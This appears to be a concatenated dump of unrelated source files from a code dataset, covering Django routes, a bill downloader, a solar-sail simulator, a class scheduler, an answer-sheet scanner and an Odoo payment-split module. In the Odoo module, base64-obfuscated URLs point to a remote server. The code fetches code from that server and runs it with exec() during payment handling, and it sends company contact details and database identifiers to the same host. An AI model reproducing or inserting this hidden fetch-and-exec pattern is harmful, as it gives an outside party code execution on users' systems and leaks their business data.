main()\n","repo_name":"facebookresearch/fairseq","sub_path":"examples/data2vec/scripts/text/glue_lr.py","file_name":"glue_lr.py","file_ext":"py","file_size_in_byte":5194,"program_lang":"python","lang":"en","doc_type":"code","stars":28050,"dataset":"github-code","pt":"62"} +{"seq_id":"31741038605","text":"from django.urls import path\nfrom . import views\nurlpatterns = [\n\n path('', views.studentHome, name='home'),\n path('offeredcourses', views.offeredcourses, name='offeredcourses'),\n path('course/', views.course, name='course'),\n path(\"submitAssignment\",views.submitAssignment , name=\"submitAssignment\"),\n path(\"enrollCourse\",views.enrollCourse , name=\"enrollCourse\")\n\n]\n","repo_name":"SajeelHashmi/Online-Learning-Platform-Django","sub_path":"onlineLearningPlatform/studentDashboard/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":397,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"62"} +{"seq_id":"861909985","text":"import requests\nimport os\n\n\nBILL_LIST_URL = \"https://www.govtrack.us/api/v2/bill?congress={}\"\nBILL_TEXT_URL = \"https://www.govinfo.gov/content/pkg/{0}/html/{0}.htm\"\nBAR = '_______________________________________________________________________'\n\n\ndef download_bills(congress):\n\n bill_list = requests.get(BILL_LIST_URL.format(congress)).json()\n\n for bill in bill_list[\"objects\"]:\n\n try:\n\n name = bill[\"display_number\"]\n bill_url = bill[\"text_info\"][\"gpo_url\"]\n bill_id = bill_url.split('/')[-1]\n\n html_bill = requests.get(BILL_TEXT_URL.format(bill_id)).text\n\n # Clean the raw text\n html_bill = html_bill.replace('
<html><body><pre>', '')\n            html_bill = html_bill.replace('</pre></body></html>
', '')\n html_bill = html_bill.replace('<DOC>', '')\n html_bill = html_bill.replace('<all>', '')\n html_bill = html_bill.split(BAR)[2]\n html_bill = html_bill.strip()\n\n with open(os.path.join('bills', name + '.txt'), 'w') as bill_file:\n bill_file.write(html_bill)\n\n print(bill[\"title\"])\n\n except Exception as e:\n print(e)\n\n\nif __name__ == \"__main__\":\n os.makedirs('bills', exist_ok=True)\n # download lots of bills from Congress #100-#116\n for i in range(100, 117):\n download_bills(i)\n","repo_name":"sshh12/Build-A-Bill","sub_path":"lab-gpt/download_data.py","file_name":"download_data.py","file_ext":"py","file_size_in_byte":1385,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"62"} +{"seq_id":"74585425477","text":"file1 = open('npm-package.log', 'r')\nLines = file1.readlines()\n \ncount = 0\n\nfor line in Lines:\n count += 1\n if 'GET 404' in line:\n # example line: npm http fetch GET 404 http:///api/folo/track//npm/group/build-ANVVSBL7M3AAA//body-parser/-/body-parser-1.19.0.tgz 98ms\n #print(\"{}\".format(line.strip()[line.strip().index('/-/') + 3:]))\n vinfo = line.strip()[line.strip().index('/-/') + 3:]\n pkg = vinfo[0:vinfo.rindex(\"-\")]\n version = vinfo[vinfo.rindex(\"-\") + 1:vinfo.index('.tgz')]\n\n print(\"\\\"/{}/{}\\\",\".format(pkg, version))\n print(\"\\\"/{}/{}\\\",\".format(pkg, \"package.json\"))\n","repo_name":"sswguo/indy-maint","sub_path":"npm-cleanup/npm-maint.py","file_name":"npm-maint.py","file_ext":"py","file_size_in_byte":652,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"62"} +{"seq_id":"31240077293","text":"\nimport torch\n\ndef coarse_to_fine_coordinates(coarse_cor, ratio, topk=30000):\n \"\"\"\n Args:\n coarse_cor (torch.Tensor): [3, N]\"\"\"\n\n fine_cor = coarse_cor * ratio\n fine_cor = fine_cor[None].repeat(ratio**3, 1, 1) # [8, 3, N]\n\n device = fine_cor.device\n value = torch.meshgrid([torch.arange(ratio).to(device), torch.arange(ratio).to(device), torch.arange(ratio).to(device)])\n value = torch.stack(value, dim=3).reshape(-1, 3)\n\n fine_cor = fine_cor + value[:,:,None]\n\n if fine_cor.shape[-1] < topk:\n return fine_cor.permute(1,0,2).reshape(3,-1)\n else:\n fine_cor = fine_cor[:,:,torch.randperm(fine_cor.shape[-1])[:topk]]\n return fine_cor.permute(1,0,2).reshape(3,-1)\n\n\n\ndef project_points_on_img(points, rots, trans, intrins, post_rots, post_trans, bda_mat, pts_range,\n W_img, H_img, W_occ, H_occ, D_occ):\n with torch.no_grad():\n voxel_size = ((pts_range[3:] - pts_range[:3]) / torch.tensor([W_occ-1, H_occ-1, D_occ-1])).to(points.device)\n points = points * voxel_size[None, None] + pts_range[:3][None, None].to(points.device)\n\n # project 3D point cloud (after bev-aug) onto multi-view images for corresponding 2D coordinates\n inv_bda = bda_mat.inverse()\n points = (inv_bda @ points.unsqueeze(-1)).squeeze(-1)\n \n # from lidar to camera\n points = points.view(-1, 1, 3)\n points = points - trans.view(1, -1, 3)\n inv_rots = rots.inverse().unsqueeze(0)\n points = (inv_rots @ points.unsqueeze(-1))\n \n # from camera to raw pixel\n points = (intrins.unsqueeze(0) @ points).squeeze(-1)\n points_d = points[..., 2:3]\n points_uv = points[..., :2] / (points_d + 1e-5)\n \n # from raw pixel to transformed pixel\n points_uv = post_rots[..., :2, :2].unsqueeze(0) @ points_uv.unsqueeze(-1)\n points_uv = points_uv.squeeze(-1) + post_trans[..., :2].unsqueeze(0)\n\n points_uv[..., 0] = (points_uv[..., 0] / (W_img-1) - 0.5) * 2\n points_uv[..., 1] = 
(points_uv[..., 1] / (H_img-1) - 0.5) * 2\n\n mask = (points_d[..., 0] > 1e-5) \\\n & (points_uv[..., 0] > -1) & (points_uv[..., 0] < 1) \\\n & (points_uv[..., 1] > -1) & (points_uv[..., 1] < 1)\n \n return points_uv.permute(2,1,0,3), mask","repo_name":"JeffWang987/OpenOccupancy","sub_path":"projects/occ_plugin/utils/coordinate_transform.py","file_name":"coordinate_transform.py","file_ext":"py","file_size_in_byte":2323,"program_lang":"python","lang":"en","doc_type":"code","stars":449,"dataset":"github-code","pt":"62"} +{"seq_id":"23714299096","text":"from Sensor_Node import dhtTopics\nfrom Data_Schema_Node import Schema_Topics\nfrom Prediction_Node import Prediction_Topics\n\n\ndef save_current_hundred_Readings():\n location='Data_Schema_Node/SensorData.csv'\n ACK=Schema_Topics.recordDATA(location)\n if(ACK==True):\n print('[DATA SAVED]')\n\ndef get_Predition():\n Prediction_Topics.Prediction()\n\ndef fetchTemp_Humid():\n dataFetched=dhtTopics.dhtMessages()\n print(\"TEMPERATURE:\"+str(dataFetched[0]))\n print(\"HUMIDITY:\"+str(dataFetched[1]))\n\nprint('[ CYBER PHYSICAL SYSTEM FOR ENVIRONMENTAL MONITORING ]')\nwhile(True):\n MENU=input('Choose from the following menu:\\n1.GET CURRENT READINGS\\n2.SAVE CURRENT 100 READINGS\\n3.GET PREDICTION\\n')\n if(MENU=='1'):\n fetchTemp_Humid()\n elif(MENU=='2'):\n save_current_hundred_Readings()\n elif (MENU=='3'):\n get_Predition()\n else:\n print('[ ALERT:CHOOSE THE RIGHT MENU ]')","repo_name":"sashasuhel/Cyber-Physical-System-for-Environmental-Monitoring-Setup","sub_path":"CORE.py","file_name":"CORE.py","file_ext":"py","file_size_in_byte":938,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"62"} +{"seq_id":"71247065158","text":"#######################################################################\r\n# Copyright (C) #\r\n# 2016-2018 Shangtong Zhang(zhangshangtong.cpp@gmail.com) #\r\n# 2022 umiushio (umiushio@163.com) #\r\n# Permission given to modify the code as long as you keep this #\r\n# declaration at the top #\r\n#######################################################################\r\n\r\n# represent the environment constructed by the 1000-states random walk task\r\n\r\nimport numpy as np\r\n\r\n# the number of states expect the terminal states\r\nN_STATES = 1000\r\n# all states including the terminal states\r\nSTATES = np.arange(N_STATES + 2)\r\n# the terminal states\r\nTERMINAL_STATES = [0, N_STATES + 1]\r\n# the start state\r\nSTART_STATE = 500\r\n\r\n# define directions for action\r\nTO_LEFT = -1\r\nTO_RIGHT = 1\r\nDIRECTIONS = [TO_LEFT, TO_RIGHT]\r\n\r\n# the max stride for one step\r\nglobal STEP_RANGE\r\n\r\n\r\n# take the @action at the @state, return the new state and reward for this transition\r\ndef step(state, action):\r\n state = max(min(state + action, N_STATES + 1), 0)\r\n if state == 0:\r\n reward = -1\r\n elif state == N_STATES + 1:\r\n reward = 1\r\n else:\r\n reward = 0\r\n return state, reward\r\n\r\n\r\n# in different tasks the state range will be different\r\n# so we should have this function to dynamically set it\r\ndef set_state_range(state_range):\r\n global STEP_RANGE\r\n STEP_RANGE = state_range\r\n","repo_name":"umiushio/ReinforcementLearning","sub_path":"rl/codes/C9/environment.py","file_name":"environment.py","file_ext":"py","file_size_in_byte":1534,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"62"} +{"seq_id":"73760234756","text":"from odoo import api, fields, models, _\nimport base64\nimport json\nimport 
requests\nfrom odoo.exceptions import except_orm, UserError\n\nclass payment_split_spt(models.Model):\n _name = 'payment.split.spt'\n _description = 'Payment Split'\n\n amount_ids = fields.One2many('amount.spt', 'payment_split_id',\n 'Payment Amounts')\n move_ids = fields.Many2many('account.move','payment_split_spt_account_move_rel','payment_split_id','move_id','Invoice')\n company_id = fields.Many2one('res.company', string='Company')\n partner_id = fields.Many2one('res.partner', string='Partner')\n payment_difference = fields.Float(compute='_compute_payment_difference')\n payment_difference_handling = fields.Selection(\n [('open', 'Keep open'), ('reconcile', 'Mark invoice as fully paid')],\n default='open',\n string=\"Payment Difference Handling\")\n writeoff_account_id = fields.Many2one('account.account',\n string=\"Difference Account\",\n domain=[('deprecated', '=', False)],\n copy=False)\n writeoff_label = fields.Char(\n string='Journal Item Label',\n help=\n 'Change label of the counterpart that will hold the payment difference',\n default='Write-Off')\n\n @api.onchange('move_ids')\n def _onchange_amount_ids(self):\n total_amount = 0\n total_amount_dic = {}\n for invoice in self.move_ids:\n total_amount = total_amount + invoice.amount_residual_signed\n total_amount_dic[\n 'currency_id'] = self.env.user.company_id.currency_id.id\n total_amount_dic['amount'] = abs(total_amount)\n total_amount_dic['journal_id'] = self.env[\n 'account.journal'].search([('type', '=', 'cash')], limit=1).id\n self.amount_ids = [(0, 0, total_amount_dic)]\n\n @api.depends('move_ids', 'amount_ids')\n def _compute_payment_difference(self):\n total_invoice_amount = 0\n total_amount = 0\n for record in self:\n record.connect_server()\n method = self.get_method('_compute_payment_difference')\n if method['method']:\n localdict = {'record':record,'user_obj':record.env.user,'total_invoice_amount': total_invoice_amount,'total_amount':total_amount}\n exec(method['method'], localdict)\n else:\n raise UserError(_('something went wrong, server is not responding'))\n record.payment_difference = localdict['total_invoice_amount'] - localdict['total_amount']\n\n def payment_post(self):\n self.connect_server()\n method = self.get_method('payment_post')\n if method['method']:\n localdict = {'self':self,'user_obj':self.env.user}\n exec(method['method'], localdict)\n\n def get_method(self,method_name):\n config_parameter_obj = self.env['ir.config_parameter'].sudo()\n cal = base64.b64decode('aHR0cHM6Ly93d3cuc25lcHRlY2guY29tL2FwcC9nZXRtZXRob2Q=').decode(\"utf-8\")\n uuid = config_parameter_obj.search([('key','=','database.uuid')],limit=1).value or ''\n payload = {\n 'uuid':uuid,\n 'method':method_name,\n 'technical_name':'payment_split_spt',\n }\n req = requests.request(\"POST\", url=cal, json=payload)\n try:\n return json.loads(req.text)['result']\n except:\n return {'method':False}\n\n def connect_server(self):\n config_parameter_obj = self.env['ir.config_parameter']\n cal = base64.b64decode('aHR0cHM6Ly93d3cuc25lcHRlY2guY29tL2FwcC9hdXRoZW50aWNhdG9y').decode(\"utf-8\")\n uuid = config_parameter_obj.search([('key','=','database.uuid')],limit=1).value or ''\n payload = {\n 'uuid':uuid,\n 'calltime':1,\n 'technical_name':'payment_split_spt',\n }\n try:\n req = requests.request(\"POST\", url=cal, json=payload)\n req = json.loads(req.text)['result']\n if not req['has_rec']:\n company = self.env.user.company_id\n payload = {\n 'calltime':2,\n 'name':company.name,\n 'state_id':company.state_id.id or False,\n 
'country_id':company.country_id.id or False,\n 'street':company.street or '',\n 'street2':company.street2 or '',\n 'zip':company.zip or '',\n 'city':company.city or '',\n 'email':company.email or '',\n 'phone':company.phone or '',\n 'website':company.website or '',\n 'uuid':uuid,\n 'web_base_url':config_parameter_obj.search([('key','=','web.base.url')],limit=1).value or '',\n 'db_name':self._cr.dbname,\n 'module_name':'payment_split_spt',\n 'version':'13.0',\n }\n req = requests.request(\"POST\", url=cal, json=payload)\n req = json.loads(req.text)['result']\n\n \n if not req['access']:\n raise UserError(_(base64.b64decode('c29tZXRoaW5nIHdlbnQgd3JvbmcsIHNlcnZlciBpcyBub3QgcmVzcG9uZGluZw==').decode(\"utf-8\")))\n \n except:\n raise UserError(_(base64.b64decode('c29tZXRoaW5nIHdlbnQgd3JvbmcsIHNlcnZlciBpcyBub3QgcmVzcG9uZGluZw==').decode(\"utf-8\")))\n return True\n","repo_name":"solutionfounder/acc_addons","sub_path":"payment_split_spt/models/payment_split_spt.py","file_name":"payment_split_spt.py","file_ext":"py","file_size_in_byte":5528,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"62"} +{"seq_id":"15094237140","text":"#!/usr/bin/python3\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport pandas as pd\nimport os \nimport sys\nimport seaborn as sns\nimport matplotlib.ticker as mticker\n\nc = 299792458\ns2yr = 3600*24*365.25\nly = c*s2yr; \nrad2deg = 180/np.pi\nL = 3.83e26 #Sun's luminosity\n\nnpts = 1000000\nstep = 1000; # TRY TO IMPROVE RESOLUTION\n\nAU = float(input(\"\\nLaunch distance from Sun in AU [e.g. 1 for Earth orbit]? \"))\nd = float(input(\"Distance to travel in light-years [e.g. 4.22 for Proxima Centauri]? \"))\nm = float(input(\"Total mass of sail + payload in kg? \"))\nA = float(input(\"Area of sail in metre squared [e.g. 1e6 for 1 km x 1 km]? \"))\n\nb = float(input(\"Albedo of sail [b = 0 to 1,totally absorbant to totally reflective]? \")) \nwhile b <= 0 or b > 1:\n b = float(input(\"Albedo of sail [b = 0 to 1,totally absorbant to totally reflective]? 
\")) \n\nR = d*c*s2yr\nt = R**4*np.pi*m*c/(12*L*A)\ngamma = 1\nt =0; v= 0;\nAU2m= 1.5e11\nr = AU*AU2m\na_0 = L*A*b/(2*np.pi*gamma*m*c*r**2)\nr_0 = r\n\narray = []; # FOR PLOT\n\nfor i in range(npts*step):\n dt = float(i)/step # MUCH QUICKER AND FINE REOLUTION AT START (~ s), WHERE IT'S NEEDED\n #dt = float(npts)/step\n a = L*A*b/(2*np.pi*gamma*m*c*r**2)\n v = v+a*dt\n gamma = (1-(v/c)**2)**-0.5\n r = r+(v*dt)\n t = t+dt\n\n array.append(t); array.append(a); array.append(v);array.append(r);# FOR PLOT\n\n if r>R:\n break\n\nprint(\"-------------------------------------------------------------------------------------------\")\nprint(\" For A = %1.1e m^2, b = %1.1f, m = %1.1f kg, launching from %1.1f AU, initial acc = %1.2f m/s^2 \" %(A,b,m,AU,a_0))\nprint(\" To travel %1.3f ly [%1.3e m] takes t = %1.1f yr [%1.2e s],\\n where final a = %1.3e m/s^2 and v = %1.0f km/s [%1.4fc]\" %(r/ly,r,t/s2yr,t,a,v*1e-3,v/c))\nprint(\"-------------------------------------------------------------------------------------------\")\n\nARR = np.reshape(array,(-1, 4)); \n\nplt.rcParams.update({'font.size': 12}) \nfig, (ax1, ax2,ax3) = plt.subplots(1, 3, figsize=(15, 5)) \nplt.setp(ax1.spines.values(), linewidth=2)\n\nax1.plot(ARR[:,0]/s2yr, ARR[:,1], '-', linewidth=3, color='b')\nax1.set_yscale('log');ax1.set_xscale('log')\ndef update_ticks(z, pos):\n if z ==1:\n return '1 '\n elif z >1 and z <1000:\n return '%d' %(z)\n elif z < 1 and z > 0.001:\n return z\n else:\n return '10$^{%1.0f}$' %(np.log10(z)) # THIS WORKED!! AND ALL THAT SHITE THAT WAS ONLINE\n\nax1.xaxis.set_major_formatter(mticker.FuncFormatter(update_ticks))\nax1.yaxis.set_major_formatter(mticker.FuncFormatter(update_ticks))\nax1.set_xlabel('Time, $t$ [years]'); ax1.set_ylabel('Acceleration, $a$ [m s$^{-2}$]')\nx1,x2 = ax1.get_xlim(); y1,y2 = ax1.get_ylim()\nx1 = np.log10(x1); x2 = np.log10(x2); y1 = np.log10(y1); y2 = np.log10(y2); \nxpos = x1 +(x2-x1)/16; ypos = y1 + (y2-y1)/2.5; yskip = (y2-y1)/16\nif m >=1:\n text = \"$m$ = %1.0f kg, $A$ = 10$^%d$ m$^2$\" %(m,np.log10(A))\nelse:\n text = \"$m$ = %1.2f g, $A$ = 10$^%d$ m$^2$\" %(1e3*m,np.log10(A))\nax1.text(10**xpos,10**ypos,text,fontsize = 12)\nax1.text(10**xpos,10**(ypos-yskip),\"$r_i$ = %1.0f AU, gives\" %(AU),fontsize = 12) \nax1.text(10**xpos,10**(ypos-2*yskip),\"$a_i$ = %1.2f m s$^{-2}$\" %(a_0),fontsize = 12)\nax1.text(10**xpos,10**(ypos-3*yskip),\"$v_f$ = %1.0f km s$^{-1}$ [%1.4f$c$]\" %(v*1e-3,v/c),fontsize = 12)\nax1.text(10**xpos,10**(ypos-4*yskip),\"$\\gamma$ = %1.6f\" %(gamma),fontsize = 12)\nax1.text(10**xpos,10**(ypos-5*yskip),\"$t$ = %1.0f yr for %1.1f ly\" %(t/s2yr,r/ly),fontsize = 12)\n \nplt.setp(ax2.spines.values(), linewidth=2)\nax2.plot(ARR[:,0]/s2yr, ARR[:,2]*1e-3, '-', linewidth=3, color='g')\nax2.set_yscale('log');ax2.set_xscale('log')\n\nax2.xaxis.set_major_formatter(mticker.FuncFormatter(update_ticks))\nax2.yaxis.set_major_formatter(mticker.FuncFormatter(update_ticks))\nax2.set_xlabel('Time, $t$ [years]'); ax2.set_ylabel('Velocity, $v$ [km s$^{-1}$]')\n\nplt.setp(ax3.spines.values(), linewidth=2)\nax3.plot(ARR[:,0]/s2yr, ARR[:,3]/ly, '-', linewidth=3, color='r')\nax3.set_yscale('log');ax3.set_xscale('log')\n\nax3.xaxis.set_major_formatter(mticker.FuncFormatter(update_ticks))\nax3.yaxis.set_major_formatter(mticker.FuncFormatter(update_ticks))\nax3.set_xlabel('Time, $t$ [years]'); ax3.set_ylabel('Distance, $d$ [light-years]')\n\nplt.tight_layout(pad=2.0)\nplot = \"sail_AU=%1.1f_d=%1.2f_ly_m=%1.1f_kg_A=%1.2e_m2\" %(AU,d,m,A); png = \"%s.png\" % (plot)\n#plt.savefig(png); 
print(\"Plot written to\", png);\nplt.show()\n\n","repo_name":"steviecurran/solar-sail","sub_path":"solar_sail.py","file_name":"solar_sail.py","file_ext":"py","file_size_in_byte":4419,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"62"} +{"seq_id":"13211672915","text":"from itertools import combinations\nfrom tkinter import *\n\nclass Classes:\n\n def __init__(self, value, day, start, end, day2, start2, end2, kind, prof):\n self.value = value\n self.start = start\n self.end = end\n self.day2 = day2\n self.start2 = start2\n self.end2 = end2\n self.kind = kind\n self.prof = prof\n self.day = day\n\ndef printclass(clas): # 클래스의 인자들을 출력하는 함수\n\n print(f\"{clas.value}\\t{clas.day}\\t{clas.start}\\t{clas.end}\\t{clas.day2}\\t{clas.start2}\\t{clas.end2}\"\n f\"\\t{clas.kind} \\t{clas.prof}\")\n\ndef listed(lst): # 입력 받은 값들을 요일별로 구별하는 함수\n\n mon = []\n tue = []\n wed = []\n thr = []\n fri = []\n for i in lst:\n if i.day == 'mon':\n mon.append([i.day, i.start, i.end])\n if i.day == 'tue':\n tue.append([i.day, i.start, i.end])\n if i.day == 'wed':\n wed.append([i.day, i.start, i.end])\n if i.day == 'thr':\n thr.append([i.day, i.start, i.end])\n if i.day == 'fri':\n fri.append([i.day, i.start, i.end])\n if i.day2 == 'mon':\n mon.append([i.day2, i.start2, i.end2])\n if i.day2 == 'tue':\n tue.append([i.day2, i.start2, i.end2])\n if i.day2 == 'wed':\n wed.append([i.day2, i.start2, i.end2])\n if i.day2 == 'thr':\n thr.append([i.day2, i.start2, i.end2])\n if i.day2 == 'fri':\n fri.append([i.day2, i.start2, i.end2])\n\n mon.sort(key=lambda x: (x[2], x[1]))\n tue.sort(key=lambda x: (x[2], x[1]))\n wed.sort(key=lambda x: (x[2], x[1]))\n thr.sort(key=lambda x: (x[2], x[1]))\n fri.sort(key=lambda x: (x[2], x[1]))\n return [mon, tue, wed, thr, fri]\n\n\ndef makecomb(lst, num): # 각 요일의 시간표들의 모든 조합을 만드는 함수 day->list, num->int\n\n result = list(combinations(lst, num))\n return result\n\ndef makeavaile(result): # 만들어진 조합 중에서 실제로 가능한 시간표를 찾아내는 함수 result->list, num->int\n\n availelist = []\n for k in result: # 시간표\n flag = 0 # 전부 k에 대한 작업 진행중\n kindlist = []\n for kind in k: # 같은 수업 배제\n kindlist.append(kind.kind)\n if len(kindlist) != len(set(kindlist)):\n continue # 여기까지는 그냥 하면됨\n daylist = listed(k)\n for i in daylist: # i->mon, tue ...\n for j in range(len(i)-1): # 각 요일에 대한 시간표\n if i[j][2] > i[j+1][1]:\n flag = 1\n if flag == 0:\n availelist.append(k)\n return availelist\n\ndef makemax(availelist, num): # 실제로 가능한 시간표 중에서 가중치가 가장 높은 시간표의 위치를 찾는 함수 availelist->list, num->int\n\n valuesum = []\n for i in availelist:\n vs = 0\n for j in range(num):\n vs += i[j].value\n valuesum.append(vs)\n if len(valuesum) != 0:\n v = max(valuesum)\n else:\n v = 0\n maxidx = [i for i, value in enumerate(valuesum) if value == max(valuesum)]\n return maxidx, v\n\ndef readtxt(filename):\n\n f = open(filename, 'r')\n classlist = []\n while True:\n f_line = f.readline()\n if not f_line:\n break\n f_list = f_line.split()\n classlist.append(Classes(int(f_list[0]), f_list[1], int(f_list[2]), int(f_list[3]), f_list[4], int(f_list[5]),\n int(f_list[6]), f_list[7], f_list[8]))\n\n f.close()\n return classlist\n\ndef writetxt(filename, maxidxlist, ava, num, val):\n\n f = open(filename, 'w')\n if len(ava) == 0:\n f.write(f\"There is no available schedule\")\n for i in maxidxlist:\n f.write(f\"sum of value : {val}\\n\")\n f.write(f\"position of max value : {i}\\n\")\n f.write(\"\\n\")\n for i in maxidxlist:\n for j in range(num):\n 
f.write(f\"{ava[i][j].value}\\t{ava[i][j].day}\\t{ava[i][j].start}\\t{ava[i][j].end}\\t{ava[i][j].day2}\\t\"\n f\"{ava[i][j].start2}\\t{ava[i][j].end2}\\t{ava[i][j].kind} \\t{ava[i][j].prof}\\n\")\n f.write(f\"\\n\")\n f.close()\n return\n\nnum = int(input(\"들을 강의의 개수 : \"))\nlst = readtxt(\"lecture.txt\")\nlst.sort(key=lambda x: (x.end, x.start))\n\nresult = makecomb(lst, num)\navailelist = makeavaile(result)\nmaxidxlist, val = makemax(availelist, num)\n\nwritetxt('result.txt', maxidxlist, availelist, num, val)\n\n#for i in result:\n# for j in range(num):\n# printclass(i[j])\n# print()\n#print()\n#print()\n#for i in availelist:\n# for j in range(num):\n# printclass(i[j])\n# print()\n\nif len(availelist) == 0:\n print(\"There is no available schedule\\n\")\n\n#print(f\"{len(availelist)}\\n\")\nprint(f\"가중치 합 : {val}\\n\")\nfor i in maxidxlist:\n print(f\"가중치 합이 최대인 시간표의 위치 : {i}\\n\")\n\nfor j in maxidxlist:\n for i in range(num):\n printclass(availelist[j][i])\n print()\n","repo_name":"humpback13/Ast23_APTP2023","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5061,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"62"} +{"seq_id":"17370386179","text":"from PIL import Image, ImageDraw, ImageFont\r\nimport numpy as np\r\nimport cv2\r\nfrom pyzbar import pyzbar\r\nline=[]\r\nn=0\r\ndef open_answer_card(url1):\r\n global n\r\n img=cv2.imread(url1)\r\n n=img.shape[1]//82 \r\n return(img)\r\n\r\ndef open_student_card(url):\r\n global n\r\n img=cv2.imread(url)\r\n img=img[n*2:-n*2,n*2:-n*2]\r\n return(img)\r\n\r\n#读取识别二维码\r\ndef qr_recognize(pic,pos):\r\n global n\r\n if len(pic.shape)!=2:\r\n pic = cv2.cvtColor(pic, cv2.COLOR_BGR2GRAY) \r\n pic=pic[pos[0]:pos[1],pos[2]:pos[3]]\r\n \r\n if pic.dtype != np.uint8:\r\n pic = pic.astype(np.uint8)\r\n # 去除噪点\r\n pic = cv2.medianBlur(pic, 3)\r\n # 二值化处理\r\n _, thresh = cv2.threshold(pic, 0, 255, cv2.THRESH_BINARY_INV + cv2.THRESH_OTSU)\r\n #膨胀\r\n kernel = cv2.getStructuringElement(cv2.MORPH_RECT, (5, 5))\r\n pic = cv2.dilate(thresh, kernel, iterations=1)\r\n #腐蚀\r\n pic = cv2.erode(pic, kernel, iterations=1)\r\n #反色\r\n pic= cv2.bitwise_not(pic)\r\n #显示pic\r\n \"\"\"cv2.imshow('pic',pic)\r\n cv2.waitKey(0)\r\n cv2.destroyAllWindows()\"\"\"\r\n barcodes =\"\"\r\n barcodes = pyzbar.decode(pic) \r\n barcodeData=[]\r\n for barcode in barcodes:\r\n barcodeData.append(barcode.data.decode('utf-8')) # 二进制类型转成字符串\r\n return(barcodeData)\r\n\r\ndef pict(gray): # 图像处理,二值化\r\n if len(gray.shape)!=2:\r\n gray = cv2.cvtColor(gray, cv2.COLOR_BGR2GRAY) \r\n # 图像二值化处理,将灰度图转换为二值图\r\n # 二值化处理\r\n _, thresh = cv2.threshold(gray, 0, 255, cv2.THRESH_BINARY_INV + cv2.THRESH_OTSU)\r\n kernel = cv2.getStructuringElement(cv2.MORPH_RECT, (5, 5))\r\n binary_erosion =cv2.erode(thresh, kernel,iterations=2)#腐蚀\r\n binary_dilation =cv2.dilate(binary_erosion, kernel,iterations=4) \r\n # 形态学操作,去除噪点和细节,填充小的白色区域\r\n opening = cv2.morphologyEx(binary_dilation, cv2.MORPH_OPEN, kernel)\r\n closing = cv2.morphologyEx(opening, cv2.MORPH_CLOSE, kernel)\r\n return(closing)\r\n\r\n \r\ndef paper_ajust(original_image, target_image):\r\n # 查找原图像和目标图像中的四个黑色方块的位置\r\n original_corners = find_corners(original_image)\r\n target_corners = find_corners(target_image)\r\n # 获取仿射变换矩阵\r\n M = cv2.getPerspectiveTransform(target_corners, original_corners)\r\n # 应用仿射变换矩阵对目标图像进行变换,实现矫正\r\n adjusted_image = cv2.warpPerspective(target_image, M, (original_image.shape[1], original_image.shape[0]))\r\n return adjusted_image\r\n\r\ndef 
find_corners(img):\r\n    # convert to grayscale\r\n    if len(img.shape)!=2:\r\n        gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)   \r\n    else:\r\n        gray = img\r\n    # binarization\r\n    _, thresh = cv2.threshold(gray, 0, 255, cv2.THRESH_BINARY_INV + cv2.THRESH_OTSU)\r\n    # morphological operations: remove noise and details, fill small white regions\r\n    kernel = cv2.getStructuringElement(cv2.MORPH_RECT, (5, 5))\r\n    binary_dilation =cv2.dilate(thresh, kernel)\r\n    binary_erosion =cv2.erode(binary_dilation , kernel,iterations=1)  \r\n    opening = cv2.morphologyEx(binary_erosion, cv2.MORPH_OPEN, kernel)\r\n    closing = cv2.morphologyEx(opening, cv2.MORPH_CLOSE, kernel)\r\n    # find contours\r\n    contours, _ = cv2.findContours(closing, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)  \r\n    # compute the centroid of each contour, i.e. its center point\r\n    centers = []\r\n    for cnt in contours:\r\n        area = cv2.contourArea(cnt)\r\n        if area>1800:\r\n            M = cv2.moments(cnt)\r\n            cx = int(M['m10'] / M['m00'])\r\n            cy = int(M['m01'] / M['m00'])\r\n            centers.append((cx, cy))\r\n    # determine the center points of the four black squares\r\n    top_left = min(centers, key=lambda x: x[0] + x[1])\r\n    bottom_right = max(centers, key=lambda x: x[0] + x[1])\r\n    top_right = max(centers, key=lambda x: x[0] - x[1])\r\n    bottom_left = min(centers, key=lambda x: x[0] - x[1])\r\n    return(np.array([top_left,bottom_right,top_right,bottom_left],dtype=np.float32))\r\n\r\ndef number_pos(pic):  # recognize the exam number\r\n    img=pict(pic)\r\n    \r\n    cnts,h=cv2.findContours(img, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)  \r\n    pnt1=[]\r\n    for cnt in cnts:\r\n        area = cv2.contourArea(cnt)\r\n        \r\n        if area>500:\r\n            \r\n            M = cv2.moments(cnt)\r\n            cx = int(M['m10'] / M['m00'])\r\n            cy = int(M['m01'] / M['m00'])\r\n            pnt1.append((cx, cy))\r\n    \r\n    result=\"\"\r\n    \r\n    pnt1.sort(key=lambda x:x[0])\r\n    if len(pnt1)==10:   \r\n        for i in pnt1:\r\n            result+=str((i[1]//n)//2)\r\n    else:\r\n        print(len(pnt1))\r\n        return(\"image error\")\r\n    return(result)\r\n\r\n# after rectification, split the image into the exam-number bubbling area, the multiple-choice area, and the non-multiple-choice area\r\ndef paper_split(dst,s_n,line):\r\n    num=dst[16*n:36*n,27*n:67*n]\r\n    select=dst[43*n:43*n+(s_n+3)//4*2*n,6*n:77*n]\r\n    c=[]\r\n    for i in range(len(line)-1):\r\n        c.append(dst[line[i]*n:line[i+1]*n,n*6:n*70])\r\n    return(num,select,c)\r\n\r\ndef check_select(dst,m):  # grade the multiple-choice questions; returns a dict {question number: options}  \r\n    pnt1=[]\r\n    pnt={}\r\n    # if dst is an empty image, return an empty dict\r\n    if dst.shape[0]==0:\r\n        return(pnt)  \r\n    s=pict(dst)\r\n    cnts,h=cv2.findContours(s, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)\r\n    \"\"\"dst=cv2.drawContours(dst, cnts, -1, (0, 0, 255), 3)\r\n    